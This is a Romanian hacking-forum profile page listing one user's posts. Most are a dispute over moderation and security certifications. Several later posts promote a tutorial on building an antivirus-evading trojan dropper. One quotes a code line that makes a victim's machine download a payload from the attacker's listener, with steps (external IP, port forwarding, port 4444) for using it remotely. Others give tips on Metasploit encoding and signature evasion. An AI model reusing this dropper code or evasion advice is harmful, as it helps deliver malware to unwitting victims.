Jump to content

h4sh

Members
  • Posts

    41
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by h4sh

  1. h4sh

    Dupa 24 de ani...

    Tinand cont de denumirea paginii sau a forumului(ROMANIAN SECURITY TEAM),si a ceea ce ar vrea sa reprezinte si sa sugereze,cred ca 99.9(3)% a postarilor,threadurilor,comentariilor,mesajelor sau numiti-le cum doriti,sunt OFFTOPIC tocmai datorita faptului ca nici 1% din aceste threaduri nu au legatura cu Info Sec. (ROMANIAN)..da vad multi romani... (SECURITY)...ar fi mai sugestiv daca ati folosi INSECURITY tinand cont de faptul ca pe acest forum se posteaza,promoveaza, vand tot felul de softuri menite sa le usureze viata si "munca" lammerilor, sau a "capuselor" (TEAM)...cred ca mai dureaza multi ani pana cand,conceptul de echipa va fi inteles,asimilat si adoptat Noapte buna!
  2. h4sh

    Dupa 24 de ani...

    Te salut em! In nici un moment nu l-am obligat pe mike_millers sa-mi raspunda.Ar fi dreptul lui sa-mi raspunda sau nu.In cazul lui tacerea a spus totul.Nici nu ar fi avut ce sa-mi raspunda... Doar ca mi se pare normal ca in momentul in care faci niste afirmatii sa existe si un fundament sau o justificare in baza carora sa poti face afirmatia respectiva. Nimeni nu obliga pe nimeni sa verifice postarile sau mesajele fiecarui membru,ar fi imposibil. Si nici nu m-am gandit in vreun moment ca ElChief a inchis topicul cu intentia de al proteja pe mike_millers.Ceea ce nu mi s-a parut corect a fost faptul ca,ElChief,dupa ce a replicat si a facut afirmatiile de mai sus,a inchis topicul fara drept la replica. Asa cum spuneam ar fi fost ok si chiar m-ar fi scutit de realizarea acestui post,daca ar fi inchis threadul direct sau cel putin daca ar fi respectat dreptul la replica. Am interpretat actiunea lui ca pe o intentie de "a arunca piatra si a ascunde mana" si chiar denota si un pic de prepotenta. Ceva de genul..."Sunt administrator,eu am ultimul cuvant si voi mucles!" Cam atat am avut de spus.Chiar nu am de gand nici sa generez si nici sa intru in polemici.Am vrut doar sa atrag atentia asupra acestui fapt.Nu stiu cat de mult a contat si nici nu stiu daca efortul meu de a publica acest thread va avea vreun rezultat insa m-as multumi sa stiu ca macar un singur user sa inteleaga mesajul. Va doresc numai bine!
  3. Salutare "malignilor"! In cursul zilei de ieri,manat de o curiozitate teribila,amplificata de o iluzie nu la fel de teribila dar suficienta incat sa ma determine sa imi doresc sa impartasesc opinii si sa interactionez cu utilizatorii si "comunitatile" dedicate "securitatii informatice" din Romania , dupa o calatorie de aproape 10 ani in afara granitelor atat fizice cat si mintale ale Romaniei,in care am experimentat si simtit pe propria piele suisurile si coborasurile aferente procesului cunoasterii de sine,am decis sa ma alatur comunitatii RST. M-am alaturat cu speranta ca,dupa 24 de ani de la momentul de cotitura,impropriu numit Revolutia din 1989,nu am sa ma lovesc de mentalitatea tipic comunista care le-a inchis gura,le-a rapit dreptul de a visa, le-a ucis sperantele parintilor nostrii,afectandu-ne implicit modul de a gandi,mentalitatea si viitorul multora dintre noi. Asa cum spuneam am decis sa urmaresc evolutia tehnologica,administrativa,legislativa si nu numai in ceea ce ceea ce priveste domeniul Info Sec din Romania. "Rasfoind" paginile web si forumurile dedicate acestui domeniu,am gasit un articol destul de interesant si al carui autor a sintetizat destul de bine situatia actuala,facand referire la nivelul tehnologic ,necesitatea adoptarii si luarea unor anumite masuri menite sa ne alinieze la standardele NATO si ale Uniunii Europene. Am citit analizat si indraznit sa comentez pe thread-ul RST https://rstforums.com/forum/68716-securitatea-infrastructurilor-informatice-romania-2.rst manat de faptul ca am observat ca un "cunoscator" nu inceta sa se laude cu realizarile lui "pe hartie": Citez: Mi s-a parut atat de ridicola postarea lui incat am indraznit sa-i cer tipul de certificare in care ar fi incadrat (GSEC,GCIH,GCIA,GPEN,GCFW, GWAPT,GCWN,GAWN,GCUX,GIS F,GICED sau GXPN) si Analyst ID# (sau numarul de identificare al certificarii GIAC de care ar dispune) constient fiind de faptul ca ar fi durat nu mai mult de 2 minute ca sa-i confirm sau nu daca este inclus in baza de date GIAC.Bineanteles,a tacut... Din pacate povestea nu s-a incheiat aici.Am primit o replica urmata de inchiderea threadului de la unul dintre administratori banuiesc,si anume ElChief.Replica sa a fost: Citez: @ElChief Nu o lua ca pe ceva personal insa mi s-ar fi parut fair ca,in momentul in care faci o afirmatie, innainte de a inchide thread-ul sa lasi si dreptul la o ultima replica,asa cum si tu ai avut-o.Daca tot e OffTopic am sa imi asum dreptul la o ultima replica,astfel: De acord cu tine dar gandeste-te la urmatorul lucru.mike_miller sustine ca a fost contractat de institutia nr.1 in SUA care se ocupa de "counter-terrorism".Da-mi voie sa am dubiile mele justificate de faptul ca o asemenea institutie nu misca un fir de iarba fara acordul NSA-ului.Chiar atat de naiv esti incat sa crezi ca o institutie ce nu tine cont de scrupule,si ale carei prioritati sunt secretizarea si securitatea nationala , ar fi dispusa sa contracteze pe oricine si mai ales pe un romanas frustrat caruia i-au murit laudatorii(daca ai citi tot articolul ai vedea ca are o problema psihologica grava)... Cat despre citatul tau sau regula pe care tu o consideri universala: Da-mi voie sa te contrazic si am sa-ti dau si un exemplu.As putea sa-ti dau mai multe insa am sa ma rezum la unul singur si cel mai sugestiv cu putinta.Baietii de la Offensive Security sunt atat de "rai" in domeniul lor incat nu numai ca ofera un training(predau) specializat dar au mai si creat doua din cele mai folosite,dezbatute si performante sisteme de operare,referindu-ma la BackTrack si Kali.Ca sa nu-i mentionez si pe "lammerii" ce formeaza echipa Rapid7 si utilitatea Metasploit. Mi se pare incorect sa faci aceasta afirmatie,tinand cont de faptul ca cel putin 50% din threadurile,comentariile si postarile care se realizeaza aici pe RST sunt generate datorita si multumita eforturilor acestor baieti. Nu o lua ca pe un afront personal,departe de mine.Insa daca ai fi inchis thread-ul fara sa faci aceste afirmatii m-ai fi scurtat si pe mine de acest efort.Nu de alta dar sunt genul de persoana ce uraste sa-i fie inchisa gura fara ca macar sa isi poata exprima o proprie parere.Si cred ca sunt in dreptul meu tinand cont de faptul ca ne place sa credem ca traim intr-un stat de drept si "democratic". Cat despre hackeri,asa cum spunea si Nemessis : Iubesc Romania,este tara mea si consider ca este o tara in care inteligenta nu lipseste.Insa aceasta inteligenta este umbrita de multe ori de mentalitatea gaunoasa si innapoiata a multora dintre noi, romanii. Acesta este motivul principal ce ma determina sa privesc ceasul asteptand cu nerabdare momentul "debarcarii". In ceea ce priveste ceasul,ma intristeaza faptul ca,in momentul in care voi parasi taramurile romanesti voi fi nevoit sa il dau,din nou,cu 25 de ani innainte. Acestea fiind spuse,cu parere de rau ma inchin si imi scot palaria in fata...unora! P.S:"Ai fi uimit sa vezi rezultatele obtinute in urma sintezei realizate prin procesul de f...re de menta a unora" Va salut! gm
  4. Bun.Iti promit ca o sa trec in revista dictionarul "urban" pe care tu mi l-ai trimis. Pana atunci,ai putea sa-mi raspunzi la intrebare?Esti PenTester,Pen tester,penetration tester sau ethical hacker? Daca raspunsul tau ar fi "Da,sunt pen tester" ai putea sa ne spui si noua care este numele tau de familie?Sau daca consideri ca nu e moral si ar fi dovada de proasta educatie sa-ti cer numele de familie,te-as ruga macar sa ne precizezi si noua tipul de certificare in care ai fi incadrat (GSEC,GCIH,GCIA,GPEN,GCFW,GWAPT,GCWN,GAWN,GCUX,GISF,GICED sau GXPN) si Analyst ID# (sau numarul de identificare al certificarii GIAC de care dispui)? Cred ca asa am elimina dubiile... Asta asa,pentru ca noi lammerii sa fim convinsi ca stam de vorba cu un adevarat profesionist. Nu de alta,dar daca traiesti cu impresia ca toti suntem tampiti s-ar putea sa ai o surpriza! Iti pot spune in 2 minute daca esti inclus in baza de date a GIAC asa ca o sa trebuiasca sa te "sfortezi" bine
  5. @ mike_millers Esti pentester?
  6. Neox chill! Nimeni nu s-a luat de greselile tale de gramatica deoarece suntem pe un forum care nu are nici o legatura cu gramatica Cat despre complicatie...S-a "complicat" sa nu creeze un simplu backdoor,deoarece,asa cum stim,antivirusul ar fi detectat acel backdoor imediat,in momentul in care victima l-ar fi descarcat(ca sa nu mai mentionam si scanarile programate). "shikata_ga_nai" este intors practic pe toate partile de antivirusi din pricina numarului imens de skiddies sau lammeri sau numeste-i cum doresti care nu fac altceva decat sa petreaca 99.9(3) la suta din timpul lor jucandu-se cu encoderele metasploit ca mai apoi sa le "urce" pe VirusTotal pt. "verificare".E de stiut faptul ca toate aceste scannere online trimit posibilele amenintari creatorilor de antivirusi. Cred ca a ales sa creeze un cod nou,in detrimentul unui backdoor,tocmai de aceea.Pt ca "antivirusii" nu il vor detecta ca amenintare tocmai datorita faptului ca e "simplu",nu prezinta "antecedente" si nici macar o linie de cod "malware". Dropperul nu face altceva decat sa apeleze un fisier,payload-ul, printr-o conexiune http. Si cred ca tutorialul se refera strict la codul sursa prezentat si nu la pasii ce ar trebui urmati referindu-ne la meterpreter sau cum sa stabilesti o sesiune meterpreter si nici la pasii aferenti.Le-ar da "mura in gura" lammerilor nu?!
  7. Pai mi se pare si normal sa foloseasca o adresa IP interna.Asa cum si el spune,este vorba de o demonstratie intr-o retea interna.Ce ai fi vrut?Sa mentioneze si IP-ul sau extern? Sintaxa ce obliga sistemul victimei sa apeleze payloadul "data.bin": HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.1.10/data.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0) Pt. a functiona la exterior,asa cum spui tu,trebuie doar sa urmezi pasii: 1."http://192.168.1.10/data.bin" - Schimba adresa IP,in cazul de fata 192.168.1.10,cu adresa ta "externa"; 2."Innainteaza" adresa IP interna a serverului tau de ascultare; 3."Deschide" portul 4444;
  8. Neox,ca sa mearga de la distanta tot ceea ce trebuie sa faci este sa-ti inaintezi adresa IP si sa deschizi porturile de ascultare. De restul,asa cum ai citit,se ocupa conexiunea "http" si dropperul in cauza. -b ,folosit ca optiune de codare, de utilitatea <msfencode> nu are nici o legatura cu exploit developmentul,implicit nu inseamna a elimina bytearray bad characters asa cum spui tu. -b ,"bifat" ca optiune in cazul utilitatii <msfencode> iti permite sa eviti folosirea anumitor caractere(asa cum stim antivirusii se folosesc de semnaturi(signatures) pentru a detecta potentialele amenintari). Nu confunda "exploit developmentul" cu procesul de codificare Cat despre erorile tale gramaticale poti sta linistit,sunt irelevante!
  9. Va salut! Zilele trecute am gasit un tutorial foarte interesant in limba romana.Explica pe indelete cum sa creati un trojan indetectabil. Din cate am citit,este vorba despre o metoda noua prin care payloadul este apelat de sistemul victimei prin intermediul unei conexiuni http la serverul de ascultare a hackerului.Diferenta consta in faptul ca nu este necesar ca payloadul sa ii fie trimis victimei.Contine si codul sursa. Il putei citi de aici : Cum sa creezi un Dropper(trojan,backdoor) "aproape" perfect Salutari!
×
×
  • Create New...